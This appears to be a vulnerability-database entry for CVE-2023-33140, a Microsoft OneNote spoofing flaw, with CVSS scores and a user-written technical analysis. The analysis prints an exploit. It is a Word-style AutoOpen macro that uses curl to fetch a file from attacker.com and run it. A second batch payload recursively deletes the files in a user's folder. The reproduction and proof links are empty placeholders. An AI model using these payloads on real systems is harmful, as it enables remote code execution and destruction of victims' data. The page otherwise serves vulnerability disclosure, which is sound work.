Attacker Value
Moderate
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Network
2

CVE-2023-33140

Disclosure Date: June 14, 2023
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated

Description

Microsoft OneNote Spoofing Vulnerability

Add Assessment

2
Ratings
Technical Analysis

CVE-2023-33140

Description:

Microsoft OneNote is vulnerable to spoofing attacks. The malicious user can trick the victim into clicking on a very maliciously crafted URL or download some other malicious file and execute it. When this happens the game will be over for the victim and his computer will be compromised.
Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker.

STATUS: 6.5 MEDIUM Vulnerability

[+]Exploit:

Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus)
End Sub

[+]Inside-exploit

@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*

Reproduce:

href

Proof and Exploit:

href

Time spend:

01:15:00

CVSS V3 Severity and Metrics
Base Score:
6.5 Medium
Impact Score:
3.6
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • microsoft

Products

  • onenote -

Additional Info

Technical Analysis